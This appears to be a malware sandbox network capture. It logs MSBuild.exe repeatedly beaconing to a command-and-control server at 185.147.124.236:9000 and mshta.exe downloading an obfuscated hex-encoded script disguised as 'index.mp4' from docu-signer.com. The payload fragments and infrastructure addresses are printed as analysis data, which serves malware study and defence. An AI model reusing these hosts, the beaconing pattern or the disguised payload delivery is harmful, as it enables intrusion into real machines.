Dec 17, 2024 08:11:45.336534977 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:45 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50005	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:45.573088884 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:46.875653982 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50011	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:47.103888035 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:48.405378103 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:48 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50016	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:48.636924028 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:49.938769102 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:49 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50020	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:50.166554928 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:51.476174116 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:51 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50025	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:51.702873945 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:53.008663893 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:52 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50030	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:53.244364023 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:54.546556950 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50034	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:54.775605917 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:56.087160110 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50039	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:56.324884892 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:57.627497911 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:57 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50045	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:57.855040073 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:59.165549040 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50049	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:59.401451111 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:12:00.711842060 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:00 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	50056	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:00.947391033 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:12:02.263401031 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	50060	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:02.540730953 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:12:03.831672907 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:03 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50067	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:04.056974888 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:12:05.359786987 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:05 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50069	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:05.613939047 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:12:06.915040016 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:06 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50074	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:07.151602030 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:12:08.454619884 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:08 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	50080	185.147.124.236	9000

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:08.683720112 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:12:09.995240927 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	50083	185.147.124.236	9000

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:12:16.861903906 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:12:17.310668945 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:12:17 GMT Connection: close

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	104.21.87.65	443	7444	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:08 UTC	346	OUT	GET /api/uz/0912545164/index.mp4 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: docu-signer.com Connection: Keep-Alive
2024-12-17 07:10:08 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:10:08 GMT Content-Type: video/mp4 Content-Length: 401840 Connection: close Last-Modified: Sun, 15 Dec 2024 12:06:03 GMT ETag: "675ec62b-621b0" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N7KdUtATlruGVSo7omOngPlEdOZZzjuHwL8jeIejW7JC9g6OnEdqrT3rkcESQCeVClceoPv1phGwxJsGT3O3QXsGpu%2FjRvqesNAyK4neQfV7JaYd%2BbS%2FTCtI92ZG4DaBSjU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f351775b9318c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1964&rtt_var=741&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=928&delivery_rate=1473259&cwnd=186&unsent_bytes=0&cid=b0ab70eedb832dc9&ts=894&x=0"
2024-12-17 07:10:08 UTC	509	IN	Data Raw: 36 36 51 37 35 6a 36 65 73 36 33 57 37 34 6f 36 39 68 36 66 76 36 65 58 32 30 75 36 61 4f 36 61 6e 36 38 71 36 61 55 35 37 63 32 38 6d 36 31 42 34 63 46 34 61 49 37 33 68 37 34 64 32 39 57 37 62 65 37 36 4f 36 31 58 37 32 6c 32 30 43 34 33 7a 37 38 7a 36 39 41 37 39 76 33 64 4a 32 30 78 32 37 48 32 37 68 33 62 52 36 36 7a 36 66 65 37 32 67 32 30 49 32 38 41 37 36 44 36 31 73 37 32 69 32 30 53 35 30 43 36 34 63 36 37 47 37 30 69 35 34 57 32 30 72 33 64 6f 32 30 44 33 30 76 33 62 79 35 30 66 36 34 6d 36 37 55 37 30 55 35 34 6c 32 30 6d 33 63 69 32 30 76 36 31 57 34 63 7a 34 61 45 37 33 71 37 34 6a 32 65 6e 36 63 4c 36 35 6d 36 65 58 36 37 5a 37 34 7a 36 38 67 33 62 5a 32 30 65 35 30 76 36 34 77 36 37 56 37 30 49 35 34 76 32 62 51 32 62 64 32 39 4a 37 62 48 Data Ascii: 66Q75j6es63W74o69h6fv6eX20u6aO6an68q6aU57c28m61B4cF4aI73h74d29W7be76O61X72l20C43z78z69A79v3dJ20x27H27h3bR66z6fe72g20I28A76D61s72i20S50C64c67G70i54W20r3do20D30v3by50f64m67U70U54l20m3ci20v61W4cz4aE73q74j2en6cL65m6eX67Z74z68g3bZ20e50v64w67V70I54v2bQ2bd29J7bH
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 4f 37 32 59 32 30 5a 34 33 57 37 38 7a 36 39 77 37 39 42 32 30 72 33 64 6b 32 30 72 36 61 42 36 61 45 36 38 4d 36 61 77 35 37 4c 32 38 62 35 62 7a 33 38 56 33 38 53 33 31 6c 32 63 78 33 38 75 33 38 42 33 30 52 32 63 6b 33 38 48 33 38 5a 33 38 6c 32 63 62 33 38 48 33 37 4c 33 30 51 32 63 53 33 38 45 33 38 52 33 33 63 32 63 51 33 38 6d 33 38 72 33 34 55 32 63 57 33 38 61 33 37 78 33 33 41 32 63 62 33 38 41 33 37 58 33 30 66 32 63 70 33 38 66 33 37 74 33 37 49 32 63 58 33 38 46 33 37 51 33 37 54 32 63 58 33 38 48 33 31 6d 33 35 73 32 63 57 33 38 51 33 37 51 33 30 64 32 63 66 33 38 6b 33 38 6d 33 39 49 32 63 65 33 38 6a 33 37 4c 33 30 4e 32 63 64 33 38 79 33 30 4f 33 31 57 32 63 78 33 38 41 33 31 71 33 34 6a 32 63 6b 33 38 75 33 38 76 33 38 77 32 63 4f 33 38 Data Ascii: O72Y20Z43W78z69w79B20r3dk20r6aB6aE68M6aw57L28b5bz38V38S31l2cx38u38B30R2ck38H38Z38l2cb38H37L30Q2cS38E38R33c2cQ38m38r34U2cW38a37x33A2cb38A37X30f2cp38f37t37I2cX38F37Q37T2cX38H31m35s2cW38Q37Q30d2cf38k38m39I2ce38j37L30N2cd38y30O31W2cx38A31q34j2ck38u38v38w2cO38
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 33 38 6e 33 30 46 33 35 58 32 63 61 33 38 70 33 35 62 33 30 70 32 63 4d 33 38 58 33 33 70 33 35 42 32 63 49 33 38 4d 33 35 57 33 31 4e 32 63 51 33 38 63 33 38 4c 33 33 44 32 63 71 33 38 79 33 30 67 33 31 4d 32 63 65 33 38 54 33 33 4d 33 30 78 32 63 45 33 38 66 33 30 76 33 31 6d 32 63 50 33 38 70 33 33 69 33 36 54 32 63 6d 33 38 69 33 37 52 33 32 66 32 63 64 33 38 4a 33 34 6b 33 36 45 32 63 42 33 38 4b 33 35 55 33 30 46 32 63 4e 33 38 45 33 33 4c 33 35 50 32 63 77 33 38 7a 33 30 67 33 39 63 32 63 47 33 38 73 33 30 73 33 38 48 32 63 64 33 38 64 33 32 6c 33 33 67 32 63 62 33 38 44 33 31 6d 33 38 53 32 63 65 33 38 43 33 32 61 33 36 68 32 63 4b 33 38 67 33 33 61 33 36 68 32 63 4e 33 38 62 33 32 4c 33 30 55 32 63 79 33 38 47 33 32 6b 33 32 41 32 63 55 33 38 67 Data Ascii: 38n30F35X2ca38p35b30p2cM38X33p35B2cI38M35W31N2cQ38c38L33D2cq38y30g31M2ce38T33M30x2cE38f30v31m2cP38p33i36T2cm38i37R32f2cd38J34k36E2cB38K35U30F2cN38E33L35P2cw38z30g39c2cG38s30s38H2cd38d32l33g2cb38D31m38S2ce38C32a36h2cK38g33a36h2cN38b32L30U2cy38G32k32A2cU38g
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 38 78 33 33 73 33 36 51 32 63 5a 33 38 77 33 32 4d 33 30 66 32 63 62 33 38 69 33 33 52 33 35 79 32 63 6d 33 38 4a 33 32 74 33 35 74 32 63 4c 33 38 46 33 31 6c 33 39 71 32 63 62 33 38 6e 33 31 77 33 38 51 32 63 4b 33 38 58 33 33 4f 33 39 4a 32 63 47 33 38 66 33 33 42 33 37 43 32 63 48 33 38 77 33 31 75 33 39 77 32 63 57 33 38 6e 33 33 54 33 35 6a 32 63 54 33 38 54 33 33 63 33 39 56 32 63 63 33 38 62 33 32 44 33 34 75 32 63 69 33 38 44 33 33 51 33 35 52 32 63 4c 33 38 6c 33 32 64 33 33 5a 32 63 41 33 38 62 33 31 46 33 38 43 32 63 68 33 38 44 33 33 59 33 34 76 32 63 68 33 38 50 33 31 71 33 39 70 32 63 4f 33 38 77 33 32 57 33 35 58 32 63 6d 33 38 42 33 32 57 33 30 48 32 63 4b 33 38 62 33 32 6f 33 32 6a 32 63 54 33 38 54 33 33 61 33 39 44 32 63 4f 33 38 6a 33 Data Ascii: 8x33s36Q2cZ38w32M30f2cb38i33R35y2cm38J32t35t2cL38F31l39q2cb38n31w38Q2cK38X33O39J2cG38f33B37C2cH38w31u39w2cW38n33T35j2cT38T33c39V2cc38b32D34u2ci38D33Q35R2cL38l32d33Z2cA38b31F38C2ch38D33Y34v2ch38P31q39p2cO38w32W35X2cm38B32W30H2cK38b32o32j2cT38T33a39D2cO38j3
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 53 33 32 4e 33 30 6c 32 63 69 33 38 54 33 33 50 33 37 4a 32 63 4f 33 38 41 33 32 69 33 31 54 32 63 59 33 38 73 33 33 4a 33 34 67 32 63 77 33 38 78 33 32 4b 33 34 72 32 63 65 33 38 53 33 32 74 33 31 52 32 63 4f 33 38 76 33 31 43 33 39 47 32 63 66 33 38 63 33 33 6f 33 36 75 32 63 50 33 38 48 33 33 6f 33 35 4d 32 63 51 33 38 70 33 33 56 33 36 4b 32 63 6e 33 38 6a 33 32 57 33 34 75 32 63 70 33 38 47 33 32 4c 33 33 68 32 63 64 33 38 6a 33 32 55 33 32 70 32 63 41 33 38 46 33 31 6b 33 37 78 32 63 59 33 38 77 33 31 57 33 37 6d 32 63 51 33 38 4a 33 32 65 33 33 6d 32 63 4d 33 38 6e 33 32 44 33 33 51 32 63 45 33 38 77 33 33 51 33 35 47 32 63 63 33 38 7a 33 32 44 33 34 75 32 63 76 33 38 7a 33 31 63 33 37 49 32 63 6a 33 38 55 33 31 64 33 37 77 32 63 48 33 38 79 33 32 Data Ascii: S32N30l2ci38T33P37J2cO38A32i31T2cY38s33J34g2cw38x32K34r2ce38S32t31R2cO38v31C39G2cf38c33o36u2cP38H33o35M2cQ38p33V36K2cn38j32W34u2cp38G32L33h2cd38j32U32p2cA38F31k37x2cY38w31W37m2cQ38J32e33m2cM38n32D33Q2cE38w33Q35G2cc38z32D34u2cv38z31c37I2cj38U31d37w2cH38y32
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 33 32 46 33 33 6b 32 63 62 33 38 47 33 33 56 33 35 78 32 63 68 33 38 59 33 32 6b 33 31 51 32 63 6b 33 38 5a 33 32 53 33 36 54 32 63 49 33 38 54 33 32 46 33 36 6d 32 63 4c 33 38 58 33 32 4e 33 30 6c 32 63 46 33 38 66 33 32 65 33 31 74 32 63 77 33 38 74 33 33 4b 33 38 73 32 63 61 33 38 6a 33 32 62 33 35 67 32 63 53 33 38 6c 33 32 49 33 31 63 32 63 6b 33 38 6b 33 32 41 33 35 44 32 63 67 33 38 70 33 32 54 33 32 42 32 63 53 33 38 54 33 33 56 33 36 43 32 63 63 33 38 63 33 33 6c 33 38 4b 32 63 4b 33 38 55 33 31 65 33 38 77 32 63 63 33 38 63 33 32 42 33 36 6e 32 63 4f 33 38 73 33 32 71 33 30 42 32 63 78 33 38 6c 33 32 41 33 35 57 32 63 4c 33 38 64 33 32 43 33 36 61 32 63 58 33 38 4a 33 33 45 33 39 51 32 63 4c 33 38 63 33 31 61 33 38 63 32 63 59 33 38 48 33 32 51 Data Ascii: 32F33k2cb38G33V35x2ch38Y32k31Q2ck38Z32S36T2cI38T32F36m2cL38X32N30l2cF38f32e31t2cw38t33K38s2ca38j32b35g2cS38l32I31c2ck38k32A35D2cg38p32T32B2cS38T33V36C2cc38c33l38K2cK38U31e38w2cc38c32B36n2cO38s32q30B2cx38l32A35W2cL38d32C36a2cX38J33E39Q2cL38c31a38c2cY38H32Q
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 32 5a 33 30 4d 32 63 61 33 38 7a 33 32 6b 33 33 59 32 63 64 33 38 41 33 33 4d 33 35 53 32 63 77 33 38 64 33 31 56 33 38 65 32 63 6c 33 38 44 33 32 73 33 35 44 32 63 68 33 38 46 33 33 4b 33 36 48 32 63 43 33 38 50 33 33 51 33 39 64 32 63 70 33 38 63 33 32 79 33 31 4c 32 63 79 33 38 75 33 31 41 33 37 4e 32 63 4c 33 38 6c 33 31 57 33 39 61 32 63 4c 33 38 44 33 33 61 33 34 57 32 63 56 33 38 75 33 32 5a 33 34 6d 32 63 70 33 38 79 33 32 46 33 34 48 32 63 6e 33 38 70 33 32 61 33 30 72 32 63 71 33 38 53 33 33 4b 33 39 4b 32 63 69 33 38 48 33 32 6a 33 34 42 32 63 42 33 38 41 33 33 54 33 38 43 32 63 63 33 38 48 33 33 53 33 35 41 32 63 67 33 38 53 33 32 73 33 30 65 32 63 66 33 38 6f 33 31 6c 33 37 49 32 63 71 33 38 65 33 33 6e 33 36 72 32 63 57 33 38 72 33 33 59 33 Data Ascii: 2Z30M2ca38z32k33Y2cd38A33M35S2cw38d31V38e2cl38D32s35D2ch38F33K36H2cC38P33Q39d2cp38c32y31L2cy38u31A37N2cL38l31W39a2cL38D33a34W2cV38u32Z34m2cp38y32F34H2cn38p32a30r2cq38S33K39K2ci38H32j34B2cB38A33T38C2cc38H33S35A2cg38S32s30e2cf38o31l37I2cq38e33n36r2cW38r33Y3
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 41 33 32 41 32 63 58 33 38 4f 33 33 46 33 36 46 32 63 65 33 38 52 33 32 59 33 33 4d 32 63 55 33 38 4f 33 33 73 33 37 44 32 63 78 33 38 58 33 33 43 33 37 78 32 63 6c 33 38 75 33 32 56 33 33 46 32 63 57 33 38 42 33 32 70 33 35 69 32 63 41 33 38 63 33 32 50 33 30 67 32 63 6d 33 38 78 33 31 65 33 39 61 32 63 55 33 38 57 33 32 48 33 34 58 32 63 4b 33 38 50 33 31 79 33 39 48 32 63 6c 33 38 6b 33 33 63 33 35 51 32 63 71 33 38 71 33 32 43 33 30 48 32 63 75 33 38 6f 33 33 6b 33 34 6f 32 63 59 33 38 75 33 32 64 33 36 57 32 63 5a 33 38 57 33 32 46 33 32 43 32 63 42 33 38 73 33 32 5a 33 34 58 32 63 6a 33 38 53 33 32 69 33 35 61 32 63 50 33 38 65 33 31 6e 33 39 57 32 63 76 33 38 4f 33 32 55 33 32 6d 32 63 59 33 38 5a 33 33 73 33 37 4a 32 63 5a 33 38 49 33 33 6d 33 37 Data Ascii: 